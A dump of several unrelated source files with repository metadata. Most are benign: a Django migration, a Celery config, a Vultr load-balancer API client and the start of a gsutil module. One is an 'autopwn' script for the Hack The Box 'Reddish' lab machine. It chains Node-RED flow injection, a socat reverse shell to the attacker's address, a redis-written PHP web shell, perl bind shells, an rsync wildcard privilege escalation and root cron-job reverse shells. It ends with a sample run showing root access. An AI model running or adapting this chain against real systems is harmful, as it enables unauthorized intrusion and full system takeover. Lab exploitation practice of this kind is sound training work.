] | 19 | 2018-08-09T20:45:51.000Z | 2021-11-29T17:47:21.000Z | djasana/migrations/0007_alter_task_completed.py | dosoulwork/django-asana | 05c63cc6a375783f84bb82821800ca419db9fa85 | [
"MIT"
] | 8 | 2018-06-28T02:54:06.000Z | 2020-02-23T13:34:46.000Z | # -*- coding: utf-8 -*-
# Generated by Django 1.11.2 on 2017-06-29 17:04
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('djasana', '0006_adds_defaults'),
]
operations = [
migrations.AlterField(
model_name='task',
name='completed_at',
field=models.DateTimeField(null=True),
),
]
| 21.428571 | 50 | 0.615556 | 49 | 450 | 5.469388 | 0.836735 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.063636 | 0.266667 | 450 | 20 | 51 | 22.5 | 0.748485 | 0.151111 | 0 | 0 | 1 | 0 | 0.108179 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.153846 | 0 | 0.384615 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
6200daab351d8a43f810d28196ac2f8c75e8b726 | 803 | py | Python | Aves2/Aves2/celery.py | jd-aig/aves2 | 10aeb832feb94adf563f9795013c77bfd115b44e | [
"Apache-2.0"
] | 3 | 2020-09-24T01:36:02.000Z | 2022-03-28T11:53:54.000Z | Aves2/Aves2/celery.py | jd-aig/aves2 | 10aeb832feb94adf563f9795013c77bfd115b44e | [
"Apache-2.0"
] | null | null | null | Aves2/Aves2/celery.py | jd-aig/aves2 | 10aeb832feb94adf563f9795013c77bfd115b44e | [
"Apache-2.0"
] | 1 | 2020-12-08T05:14:23.000Z | 2020-12-08T05:14:23.000Z | # -*- coding:utf-8 -*-
from __future__ import absolute_import, unicode_literals
import os
from celery import Celery
from celery.schedules import crontab
# from celery_once import QueueOnce
# set the default Django settings module for the 'celery' program.
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'Aves2.settings')
app = Celery('Aves2')
# Using a string here means the worker don't have to serialize
# the configuration object to child processes.
# - namespace='CELERY' means all celery-related configuration keys
# should have a `CELERY_` prefix.
app.config_from_object('django.conf:settings', namespace='CELERY')
# Load task modules from all registered Django app configs.
app.autodiscover_tasks()
app.conf.timezone = 'Asia/Shanghai'
# Add periodic-tasks
app.conf.beat_schedule = {
}
| 27.689655 | 66 | 0.775841 | 111 | 803 | 5.486486 | 0.576577 | 0.049261 | 0.065681 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.004304 | 0.132005 | 803 | 28 | 67 | 28.678571 | 0.86944 | 0.499377 | 0 | 0 | 0 | 0 | 0.204082 | 0.056122 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.363636 | 0 | 0.363636 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
6202a8816bac81aec1be652ea835f294593e8695 | 12,009 | py | Python | pyvultr/v2/load_balance.py | luxiaba/pyvultr | 29b45d036f728c15d91c4b590bd893b9c7f609ae | [
"MIT"
] | 4 | 2021-12-01T18:06:18.000Z | 2022-01-22T12:39:52.000Z | pyvultr/v2/load_balance.py | luxiaba/pyvultr | 29b45d036f728c15d91c4b590bd893b9c7f609ae | [
"MIT"
] | 1 | 2021-12-19T14:05:42.000Z | 2021-12-19T14:05:42.000Z | pyvultr/v2/load_balance.py | luxiaba/pyvultr | 29b45d036f728c15d91c4b590bd893b9c7f609ae | [
"MIT"
] | 1 | 2021-12-20T04:54:08.000Z | 2021-12-20T04:54:08.000Z | from dataclasses import dataclass
from functools import partial
from typing import Dict, List, Optional
from urllib.parse import urljoin
from pyvultr.utils import BaseDataclass, VultrPagination, get_only_value, merge_args
from .base import BaseVultrV2, command
from .enums import LoadBalanceAlgorithm, LoadBalanceProtocol
@dataclass
class LoadBalanceGenericInfo(BaseDataclass):
# If true, this will redirect all HTTP traffic to HTTPS.
# You must have an HTTPS rule and SSL certificate installed on the load balancer to enable this option.
ssl_redirect: bool
sticky_sessions: Dict # Array of sticky session cookies({'cookie_name': 'xxx'}).
# ID of the private network you wish to use.
# If private_network is omitted it will default to the public network.
private_network: str
# The balancing algorithm, see `enums.LoadBalanceAlgorithm` for possible values.
balancing_algorithm: str = LoadBalanceAlgorithm.ROUND_ROBIN.value
# If true, you must configure backend nodes to accept Proxy protocol. default is false.
proxy_protocol: bool = False
@dataclass
class LoadBalanceHealthCheck(BaseDataclass):
protocol: str # The protocol to use for health checks, see `enums.LoadBalanceProtocol` for possible values.
port: int # The port to use for health checks.
path: str # HTTP Path to check. Only applies if Protocol is HTTP or HTTPS.
check_interval: int # Interval between health checks.
response_timeout: int # Timeout before health check fails.
unhealthy_threshold: int # Number times a check must fail before becoming unhealthy.
healthy_threshold: int # Number of times a check must succeed before returning to healthy status.
@dataclass
class LoadBalanceForwardRule(BaseDataclass):
id: str # A unique ID for the forwarding rule.
# The protocol on the Load Balancer to forward to the backend.
# see `enums.LoadBalanceProtocol` for possible values.
frontend_protocol: str
frontend_port: int # The port number on the Load Balancer to forward to the backend.
# The protocol destination on the backend server.
# see `enums.LoadBalanceProtocol` for possible values.
backend_protocol: str
backend_port: int # The port number destination on the backend server.
@dataclass
class LoadBalanceFirewallRule(BaseDataclass):
id: str # A unique ID for the firewall rule.
port: int # Port for this rule.
# If the source string is given a value of "cloudflare" then cloudflare IPs will be supplied.
# Otherwise enter a IP address with subnet size that you wish to permit through the firewall.
# | Value | Description
# | ---------------- | -----------
# | "192.168.1.1/16" | Ip address with a subnet size.
# | "cloudflare" | Allow all of Cloudflare's IP space through the firewall
source: str
ip_type: str # The type of IP rule, see `enums.IPType` for possible values.
@dataclass
class LoadBalance(BaseDataclass):
id: str # A unique ID for the Load Balancer.
date_created: str # Date this Load Balancer was created.
# The Region id where the instance is located, check `RegionAPI.list` and `RegionItem.id` for available regions.
region: str
label: str # The user-supplied label for this load-balancer.
status: str # The current status, see `enums.LoadBalanceStatus` for possible values.
ipv4: str # The IPv4 address of this Load Balancer.
ipv6: str # The IPv6 address of this Load Balancer.
generic_info: LoadBalanceGenericInfo # An object containing additional options.
health_check: LoadBalanceHealthCheck
has_ssl: bool # Indicates if this Load Balancer has an SSL certificate installed.
forwarding_rules: List[LoadBalanceForwardRule] # An array of forwarding rule objects.
instances: List[str] # Array of Instance ids attached to this Load Balancer.
firewall_rules: List[LoadBalanceFirewallRule] # An array of firewall rule objects.
class LoadBalanceAPI(BaseVultrV2):
"""Vultr LoanBalance API.
Reference: https://www.vultr.com/api/#tag/load-balancer
Load Balancers sit in front of your application and distribute incoming traffic across multiple Instances.
When you control the load balancer via the API, you can inspect the results in the customer portal.
Attributes:
api_key: Vultr API key, we get it from env variable `$VULTR_API_KEY` if not provided.
"""
def __init__(self, api_key: Optional[str] = None):
super().__init__(api_key)
@property
def base_url(self):
"""Get base url for all API in this section."""
return urljoin(super().base_url, "load-balancers")
@command
def list(self, per_page: int = None, cursor: str = None, capacity: int = None) -> VultrPagination[LoadBalance]:
"""List the Load Balancers in your account.
Args:
per_page: Number of items requested per page. Default is 100 and Max is 500.
cursor: Cursor for paging.
capacity: The capacity of the VultrPagination[LoadBalanceItem], see `VultrPagination` for details.
Returns:
VultrPagination[LoadBalance]: A list-like object of `LoadBalanceItem` object.
"""
return VultrPagination[LoadBalance](
fetcher=self._get,
cursor=cursor,
page_size=per_page,
return_type=LoadBalance,
capacity=capacity,
)
@command
def create(self, region: str, **kwargs) -> LoadBalance:
"""Create a new Load Balancer in a particular `region`.
Args:
region: The Region id to create this Load Balancer.
**kwargs: New LoanBalance parameters.
Returns:
LoadBalance: The LoadBalanceItem object.
"""
_fixed_kwargs = {"region": region}
resp = self._post(json=merge_args(kwargs, _fixed_kwargs))
return LoadBalance.from_dict(get_only_value(resp))
@command
def get(self, load_balancer_id: str) -> LoadBalance:
"""Get information for a Load Balancer.
Args:
load_balancer_id: The Loan Balance id.
Returns:
LoadBalance: The LoadBalanceItem object.
"""
resp = self._get(f"/{load_balancer_id}")
return LoadBalance.from_dict(get_only_value(resp))
@command
def update(self, load_balancer_id: str, **kwargs):
"""Update information for a Load Balancer.
All attributes are optional. If not set, the attributes will retain their original values.
Args:
load_balancer_id: The Loan Balance id.
**kwargs: Updated LoanBalance parameters.
Returns:
STATUS CODE: 204
/NO CONTENT/
"""
return self._patch(f"/{load_balancer_id}", json=kwargs)
@command
def delete(self, load_balancer_id: str):
"""Delete a Load Balancer.
Args:
load_balancer_id: The Loan Balance id.
Returns:
STATUS CODE: 204
/NO CONTENT/
"""
return self._delete(f"/{load_balancer_id}")
@command
def list_forwarding_rules(
self,
load_balancer_id: str,
per_page: int = None,
cursor: str = None,
capacity: int = None,
) -> VultrPagination[LoadBalanceForwardRule]:
"""List the forwarding rules for a Load Balancer.
Args:
load_balancer_id: The Loan Balance id.
per_page: number of items requested per page. Default is 100 and Max is 500.
cursor: cursor for paging.
capacity: The capacity of the VultrPagination[LoadBalanceForwardRule], see `VultrPagination` for details.
Returns:
VultrPagination[LoadBalanceForwardRule]: A list-like object of `LoadBalanceForwardRule` object.
"""
fetcher = partial(self._get, endpoint=f"/{load_balancer_id}/forwarding-rules")
return VultrPagination[LoadBalanceForwardRule](
fetcher=fetcher,
cursor=cursor,
page_size=per_page,
return_type=LoadBalanceForwardRule,
capacity=capacity,
)
@command
def create_forwarding_rule(
self,
load_balancer_id: str,
frontend_protocol: LoadBalanceProtocol,
frontend_port: int,
backend_protocol: LoadBalanceProtocol,
backend_port: int,
) -> LoadBalanceForwardRule:
"""Create a new forwarding rule for a Load Balancer.
Args:
load_balancer_id: The Loan Balance id.
frontend_protocol: The protocol on the Load Balancer to forward to the backend.
frontend_port: The port number on the Load Balancer to forward to the backend.
backend_protocol: The protocol destination on the backend server.
backend_port: The port number destination on the backend server.
Returns:
LoadBalanceForwardRule: A `LoadBalanceForwardRule` object.
"""
_json = {
"frontend_protocol": frontend_protocol.value,
"frontend_port": frontend_port,
"backend_protocol": backend_protocol.value,
"backend_port": backend_port,
}
resp = self._post(f"/{load_balancer_id}/forwarding-rules", json=_json)
return LoadBalanceForwardRule.from_dict(get_only_value(resp))
@command
def get_forwarding_rule(self, load_balancer_id: str, forwarding_rule_id: str) -> LoadBalanceForwardRule:
"""Get information for a Forwarding Rule on a Load Balancer.
Args:
load_balancer_id: The Loan Balance id.
forwarding_rule_id: The Forwarding Rule id.
Returns:
LoadBalanceForwardRule: A `LoadBalanceForwardRule` object.
"""
resp = self._get(f"/{load_balancer_id}/forwarding-rules/{forwarding_rule_id}")
return LoadBalanceForwardRule.from_dict(get_only_value(resp))
@command
def delete_forwarding_rule(self, load_balancer_id: str, forwarding_rule_id: str):
"""Delete a Forwarding Rule on a Load Balancer.
Args:
load_balancer_id: The Loan Balance id.
forwarding_rule_id: The Forwarding Rule id.
Returns:
STATUS CODE: 204
/NO CONTENT/
"""
return self._delete(f"/{load_balancer_id}/forwarding-rules/{forwarding_rule_id}")
@command
def list_firewall_rules(
self,
load_balancer_id: str,
per_page: int = None,
cursor: str = None,
capacity: int = None,
) -> VultrPagination[LoadBalanceFirewallRule]:
"""List the firewall rules for a Load Balancer.
Args:
load_balancer_id:
per_page: number of items requested per page. Default is 100 and Max is 500.
cursor: cursor for paging.
capacity: The capacity of the VultrPagination[LoadBalanceFirewallRule], see `VultrPagination` for details.
Returns:
VultrPagination[LoadBalanceFirewallRule]: A list-like object of `LoadBalanceFirewallRule` object.
"""
fetcher = partial(self._get, endpoint=f"/{load_balancer_id}/firewall-rules")
return VultrPagination[LoadBalanceFirewallRule](
fetcher=fetcher,
cursor=cursor,
page_size=per_page,
return_type=LoadBalanceFirewallRule,
capacity=capacity,
)
@command
def get_firewall_rule(self, load_balancer_id: str, forwarding_rule_id: str) -> LoadBalanceFirewallRule:
"""Get a firewall rule for a Load Balancer.
Args:
load_balancer_id: The Loan Balance id.
forwarding_rule_id: The firewall rule id.
Returns:
LoadBalanceFirewallRule: A `LoadBalanceFirewallRule` object.
"""
resp = self._get(f"/{load_balancer_id}/firewall-rules/{forwarding_rule_id}")
return LoadBalanceFirewallRule.from_dict(get_only_value(resp))
| 39.117264 | 118 | 0.670081 | 1,417 | 12,009 | 5.545519 | 0.190543 | 0.07941 | 0.048104 | 0.020616 | 0.444642 | 0.376559 | 0.328582 | 0.313948 | 0.266353 | 0.250445 | 0 | 0.004815 | 0.256391 | 12,009 | 306 | 119 | 39.245098 | 0.87514 | 0.486802 | 0 | 0.340426 | 0 | 0 | 0.075758 | 0.050813 | 0 | 0 | 0 | 0 | 0 | 1 | 0.092199 | false | 0 | 0.049645 | 0 | 0.510638 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
62034dcbe266726fc371d74a18776dc2103cd7d1 | 12,848 | py | Python | hacking/HTB/Reddish/autopwn_reddish.py | Qazeer/code-snippets | 6b15afb66312cbcf7c29f9ea32933ad0cbf65154 | [
"Unlicense"
] | 219 | 2017-12-12T20:05:37.000Z | 2022-03-27T06:08:08.000Z | hacking/HTB/Reddish/autopwn_reddish.py | FDlucifer/code-snippets | 2635cf04bc90f1cd0e6b850a9b70d689f1ab7aba | [
"Unlicense"
] | 3 | 2018-11-10T13:33:42.000Z | 2020-10-21T13:53:00.000Z | hacking/HTB/Reddish/autopwn_reddish.py | FDlucifer/code-snippets | 2635cf04bc90f1cd0e6b850a9b70d689f1ab7aba | [
"Unlicense"
] | 108 | 2017-12-17T18:17:14.000Z | 2022-03-15T13:24:44.000Z | #!/usr/bin/env python2
# Author: Alamot
import json
import time
import uuid
import fcntl
import base64
import urllib
import random
import requests
from pwn import *
def get_ip_address(ifname):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
return socket.inet_ntoa(fcntl.ioctl(
s.fileno(),
0x8915, # SIOCGIFADDR
struct.pack('256s', ifname[:15].encode())
)[20:24])
# context.log_level = 'debug'
LHOST = get_ip_address('tun0')
LPORT1 = "60000"
LPORT2 = str(random.randint(60003, 62535))
LPORT3 = str(random.randint(62535, 65535))
LPORT4 = "60001"
UUIDNAME = str(uuid.uuid4())[:8]
SOCAT_SRCPATH = "socat"
SOCAT_DSTPATH = "/var/tmp/socat" + UUIDNAME
SUBASH_PATH = "/var/tmp/" + UUIDNAME
CRONPL_PATH = "/tmp/" + UUIDNAME
def send_payloads():
session = requests.Session()
# Get id
p1 = log.progress("Getting our id")
headers = {"User-Agent":"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)","Connection":"close","Accept-Language":"en","Accept":"*/*"}
try:
response = session.post("http://10.10.10.94:1880/", headers=headers)
if response.status_code != 200:
p1.failure("Status "+str(response.status_code))
sys.exit()
else:
uid = json_data = json.loads(response.text)["id"].strip()
p1.success("OK (id = " + uid + ")")
except requests.exceptions.RequestException as e:
p1.failure(str(e))
sys.exit()
# Load flows
p2 = log.progress("Loading node-red flows")
with open(SOCAT_SRCPATH, 'r') as f:
b64upload = base64.b64encode(f.read())
rawBody = "{\"flows\":[{\"id\":\"e97f052f.2f3d48\",\"type\":\"tab\",\"label\":\"Flow 1\"},{\"id\":\"6c08c84b.d9c578\",\"type\":\"inject\",\"z\":\"e97f052f.2f3d48\",\"name\":\"\",\"topic\":\"\",\"payload\":\"node -e '(function(){ var cp = require(\\\"child_process\\\"), sh = cp.spawn(\\\"/bin/sh\\\", [\\\"-c\\\", \\\"cat " + SOCAT_DSTPATH + ".b64 | base64 -d > " +SOCAT_DSTPATH + " && chmod +x " + SOCAT_DSTPATH + " && " + SOCAT_DSTPATH + " exec:/bin/bash,pty,rawer,echo=0,stderr,setsid,sigint tcp:" + LHOST + ":" + LPORT1 + "\\\"]); return /a/; })();'\",\"payloadType\":\"str\",\"repeat\":\"\",\"crontab\":\"\",\"once\":false,\"onceDelay\":0.1,\"x\":151,\"y\":88,\"wires\":[[\"d27da06a.44a1a\"]]},{\"id\":\"d27da06a.44a1a\",\"type\":\"exec\",\"z\":\"e97f052f.2f3d48\",\"command\":\"\",\"addpay\":true,\"append\":\"\",\"useSpawn\":\"false\",\"timer\":\"\",\"oldrc\":false,\"name\":\"\",\"x\":310,\"y\":80,\"wires\":[[],[],[]]},{\"id\":\"fae51292.d8e68\",\"type\":\"inject\",\"z\":\"e97f052f.2f3d48\",\"name\":\"\",\"topic\":\"\",\"payload\":\"" + b64upload +"\",\"payloadType\":\"str\",\"repeat\":\"\",\"crontab\":\"\",\"once\":false,\"onceDelay\":0.1,\"x\":113,\"y\":260,\"wires\":[[\"7e1e7cb5.664234\"]]},{\"id\":\"7e1e7cb5.664234\",\"type\":\"file\",\"z\":\"e97f052f.2f3d48\",\"name\":\"\",\"filename\":\"" + SOCAT_DSTPATH +".b64\",\"appendNewline\":false,\"createDir\":false,\"overwriteFile\":\"true\",\"x\":320,\"y\":260,\"wires\":[]}]}"
headers = {"Accept":"*/*","X-Requested-With":"XMLHttpRequest","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0","Referer":"http://10.10.10.94:1880/red/"+uid+"/flows","Node-RED-API-Version":"v2","Connection":"close","Accept-Language":"en-US,en;q=0.5","DNT":"1","Content-Type":"application/json; charset=utf-8","Node-RED-Deployment-Type":"full"}
try:
response = session.post("http://10.10.10.94:1880/red/"+uid+"/flows", data=rawBody, headers=headers)
if response.status_code != 200:
p2.failure("Status "+str(response.status_code))
sys.exit()
else:
p2.success("OK")
except requests.exceptions.RequestException as e:
p2.failure(str(e))
sys.exit()
# Inject base64-encoded socat
p3 = log.progress("Injecting base64-encoded socat")
headers = {"Accept":"*/*","X-Requested-With":"XMLHttpRequest","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0","Referer":"http://10.10.10.94:1880/red/"+uid+"/inject/fae51292.d8e68","Node-RED-API-Version":"v2","Connection":"close","Accept-Language":"en-US,en;q=0.5","DNT":"1"}
try:
response = session.post("http://10.10.10.94:1880/red/"+uid+"/inject/fae51292.d8e68", headers=headers)
if response.status_code != 200:
p3.failure("Status "+str(response.status_code))
sys.exit()
else:
p3.success("OK")
except requests.exceptions.RequestException as e:
p3.failure(str(e))
sys.exit()
# Inject nodejs reverse shell
p4 = log.progress("Injecting socat reverse shell via nodejs [" + LHOST + ":" + str(LPORT1) + "]")
headers = {"Accept":"*/*","X-Requested-With":"XMLHttpRequest","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0","Referer":"http://10.10.10.94:1880/red/" + uid + "/inject/6c08c84b.d9c578","Node-RED-API-Version":"v2","Connection":"close","Accept-Language":"en-US,en;q=0.5","DNT":"1"}
try:
response = session.post("http://10.10.10.94:1880/red/" + uid + "/inject/6c08c84b.d9c578", headers=headers)
if response.status_code != 200:
p4.failure("Status "+str(response.status_code))
sys.exit()
else:
p4.success("OK")
except requests.exceptions.RequestException as e:
p4.failure(str(e))
sys.exit()
print("What shell do you want?")
print("[1] root@nodered")
print("[2] www-data@www")
print("[3] root@www")
print("[4] root@backup")
print("[5] root@reddish")
print("[6] Exit")
response = None
while response not in ["1", "2", "3", "4", "5", "6"]:
response = raw_input("Please enter a number 1-6: ").strip()
if response == "6":
sys.exit()
try:
threading.Thread(target=send_payloads).start()
except Exception as e:
log.error(str(e))
socat = listen(LPORT1, bindaddr=LHOST, timeout=20).wait_for_connection()
if response == "1":
socat.interactive()
sys.exit()
with log.progress("Uploading " + UUIDNAME + ".php on the www container via redis") as p:
socat.sendline("/bin/echo -ne '*1\\r\\n$8\\r\\nFLUSHALL\\r\\n*3\\r\\n$3\\r\\nSET\\r\\n$1\\r\\n1\\r\\n$45\\r\\n<?php echo shell_exec($_GET[\"e\"].\" 2>&1\"); ?>\\r\\n*4\\r\\n$6\\r\\nCONFIG\\r\\n$3\\r\\nSET\\r\\n$10\\r\\ndbfilename\\r\\n$12\\r\\n" + UUIDNAME + ".php\\r\\n*4\\r\\n$6\\r\\nCONFIG\\r\\n$3\\r\\nSET\\r\\n$3\\r\\ndir\\r\\n$46\\r\\n/var/www/html/8924d0549008565c554f8128cd11fda4\\r\\n*1\\r\\n$4\\r\\nSAVE\\r\\n' | " + SOCAT_DSTPATH + " - TCP:redis:6379")
socat.sendline("/bin/echo -ne 'GET /8924d0549008565c554f8128cd11fda4/" + UUIDNAME+ ".php?e=$(whoami)@$(hostname)END HTTP/1.1\\r\\nHost: nodered\\r\\nUser-agent: curl\\r\\n\\r\\n' | " + SOCAT_DSTPATH + " - TCP:www:80")
output = socat.recvuntil("www-data@www")
if "www-data@www" in output:
p.success("OK (user = www-data@www)")
else:
p.failure("FAIL")
sys.exit()
with log.progress("Sending perl bind shell [www-data@www:" + str(LPORT2) + "] via " + UUIDNAME + ".php & trying to connect") as p:
perl_payload = "perl -e 'use Socket;$p=" + str(LPORT2) +";socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));bind(S,sockaddr_in($p, INADDR_ANY));listen(S,SOMAXCONN);for(;$p=accept(C,S);close C){open(STDIN,\">&C\");open(STDOUT,\">&C\");open(STDERR,\">&C\");exec(\"/bin/bash -i\");};'"
urled_perl_payload = urllib.quote_plus(perl_payload)
socat.sendline("/bin/echo -ne 'GET /8924d0549008565c554f8128cd11fda4/" + UUIDNAME + ".php?e=" + urled_perl_payload + " HTTP/1.1\\r\\nHost: nodered\\r\\nUser-Agent: curl\\r\\n\\r\\n' | " + SOCAT_DSTPATH + " - TCP:www:80")
socat.sendline(SOCAT_DSTPATH + " file:`tty`,echo=0,rawer TCP:www:" + str(LPORT2))
output = socat.recvuntil("shell", timeout=20)
if "shell" in output:
p.success("OK")
else:
p.failure("FAIL")
sys.exit()
socat.sendline("script --return -c '/bin/bash -i' /dev/null")
socat.clean(1)
socat.sendline("stty raw -echo")
if response == "2":
socat.interactive()
sys.exit()
with log.progress("Exploiting wildcards for privesc. Wait at most 180 secs for rsync backup job to run") as p:
socat.sendline('echo "/bin/cp /bin/bash ' + SUBASH_PATH + ';/bin/chmod 4755 ' + SUBASH_PATH + '" > "/var/www/html/f187a0ec71ce99642e4f0afbd441a68b/' + UUIDNAME + '.rdb"')
socat.sendline('touch "/var/www/html/f187a0ec71ce99642e4f0afbd441a68b/-e sh ' + UUIDNAME + '.rdb"')
count = 0
while True:
p.status(str(count))
sleep(1)
socat.sendline("[ -f " + SUBASH_PATH + " ] && echo 'OK' || echo 'NO'")
socat.recvuntil('$ ')
output = socat.recv(3).strip()
if "OK" in output:
p.success("OK")
break
count += 1
if count > 180:
p.failure("FAIL")
sys.exit()
socat.sendline(SUBASH_PATH + ' -i -p')
socat.sendline("cd /root")
socat.clean(1)
if response == "3":
socat.interactive()
sys.exit()
with log.progress("Sending a cronjob for bind shell [root@backup:" +str(LPORT3)+ "]. Please wait") as p:
socat.sendline("echo 'use Socket;$p=" + str(LPORT3) + ";socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));bind(S,sockaddr_in($p, INADDR_ANY));listen(S,SOMAXCONN);for(;$p=accept(C,S);close C){open(STDIN,\">&C\");open(STDOUT,\">&C\");open(STDERR,\">&C\");exec(\"/bin/bash -i\");};' > " + CRONPL_PATH + ".pl")
socat.sendline("echo '* * * * * root /usr/bin/perl " + CRONPL_PATH + ".pl' > " + CRONPL_PATH + "cronjob")
socat.sendline("rsync -a " + CRONPL_PATH + ".pl backup::src" + CRONPL_PATH + ".pl")
socat.sendline("rsync -a " + CRONPL_PATH + "cronjob backup::src/etc/cron.d/")
for i in range(62):
p.status(str(61 - i))
time.sleep(1)
socat.sendline("perl -MFcntl=F_SETFL,F_GETFL,O_NONBLOCK -MSocket '-e$0=perl;socket($c,AF_INET,SOCK_STREAM,0)&&connect($c,pack_sockaddr_in("+ str(LPORT3) + ",inet_aton(\"backup\")))||die$!;fcntl$_,F_SETFL,O_NONBLOCK|fcntl$_,F_GETFL,0 for@d=(*STDIN,$c),@e=($c,*STDOUT);L:for(0,1){sysread($d[$_],$f,8**5)||exit and$f[$_].=$f if vec$g,$_*($h=fileno$c),1;substr$f[$_],0,syswrite($e[$_],$f[$_],8**5),\"\";vec($g,$_*$h,1)=($i=length$f[$_]<8**5);vec($j,$_||$h,1)=!!$i}select$g,$j,$k,5;goto L'")
output = socat.recvuntil("shell", timeout=20)
if "shell" in output:
p.success("OK")
else:
p.failure("FAIL")
sys.exit()
socat.sendline("script --return -c '/bin/bash -i' /dev/null")
socat.clean(1)
socat.sendline("stty raw -echo")
if response == "4":
socat.interactive()
sys.exit()
with log.progress("Sending reverse shell cronjob [" + LHOST + ":" +str(LPORT4)+ "] for root@host. Please wait") as p:
socat.sendline("mkdir /mnt/sda1")
socat.sendline("mount /dev/sda1 /mnt/sda1")
socat.sendline("cat /mnt/sda1/root/root.txt")
socat.sendline("echo 'import os,pty,socket;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"" + LHOST + "\"," + str(LPORT4) + "));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);os.putenv(\"HISTFILE\",\"/dev/null\");pty.spawn([\"/bin/bash\",\"-i\"]);s.close();exit();' > /mnt/sda1/tmp/" + UUIDNAME + ".py")
socat.sendline("echo '* * * * * root /usr/bin/python /tmp/" + UUIDNAME + ".py' > /mnt/sda1/etc/cron.d/" + UUIDNAME + "cronjob")
host_shell = listen(LPORT4, bindaddr=LHOST, timeout=65).wait_for_connection()
if host_shell.sock is None:
p.failure("FAIL")
sys.exit()
else:
p.success("OK")
host_shell.interactive()
sys.exit()
'''
$ ./autopwn_reddish.py
What shell do you want?
[1] root@nodered
[2] www-data@www
[3] root@www
[4] root@backup
[5] root@reddish
[6] Exit
Please enter a number 1-6: 5
[+] Getting our id: OK (id = 25af4604ab3402f2bdea796ac32bbcc3)
[+] Trying to bind to 10.10.12.229 on port 60000: Done
[+] Waiting for connections on 10.10.12.229:60000: Got connection from 10.10.10.94 on port 46784
[+] Loading node-red flows: OK
[+] Injecting base64-encoded socat: OK
[+] Injecting socat reverse shell via nodejs [10.10.12.229:60000]: OK
[+] Uploading 1994851d.php on the www container via redis: OK (user = www-data@www)
[+] Sending perl bind shell [www-data@www:61031] via 1994851d.php & trying to connect: OK
[+] Exploiting wildcards for privesc. Wait at most 180 secs for rsync backup job to run: OK
[+] Sending a cronjob for bind shell [root@backup:65104]. Please wait: OK
[+] Sending reverse shell cronjob 10.10.12.229:60001] for root@host. Please wait: OK
[+] Trying to bind to 10.10.12.229 on port 60001: Done
[+] Waiting for connections on 10.10.12.229:60001: Got connection from 10.10.10.94 on port 50432
[*] Switching to interactive mode
root@reddish:~# $
'''
| 53.090909 | 1,448 | 0.611768 | 1,847 | 12,848 | 4.203032 | 0.22144 | 0.006441 | 0.006956 | 0.009275 | 0.512044 | 0.464511 | 0.412598 | 0.36339 | 0.303491 | 0.261754 | 0 | 0.076675 | 0.154421 | 12,848 | 241 | 1,449 | 53.311203 | 0.637887 | 0.011675 | 0 | 0.347826 | 0 | 0.092391 | 0.42711 | 0.148643 | 0 | 0 | 0.00052 | 0 | 0 | 1 | 0.01087 | false | 0 | 0.054348 | 0 | 0.070652 | 0.038043 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
620690da1f145b5b2420aa8da8460ba8aab12a29 | 9,636 | py | Python | google-cloud-sdk/platform/gsutil/gslib/commands/notification.py | KaranToor/MA450 | c98b58aeb0994e011df960163541e9379ae7ea06 | [
"Apache-2.0"
] | 1 | 2017-11-29T18:52:27.000Z | 2017-11-29T18:52:27.000Z | google-cloud-sdk/.install/.backup/platform/gsutil/gslib/commands/notification.py | KaranToor/MA450 | c98b58aeb0994e011df960163541e9379ae7ea06 | [
"Apache-2.0"
] | null | null | null | google-cloud-sdk/.install/.backup/platform/gsutil/gslib/commands/notification.py | KaranToor/MA450 | c98b58aeb0994e011df960163541e9379ae7ea06 | [
"Apache-2.0"
] | 1 | 2020-07-25T12:09:01.000Z | 2020-07-25T12:09:01.000Z | # -*- coding: utf-8 -*-
# Copyright 2013 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This module provides the notification command to gsutil."""
from __future__ import absolute_import
import getopt
import uuid
from gslib import metrics
from gslib.cloud_api import AccessDeniedException
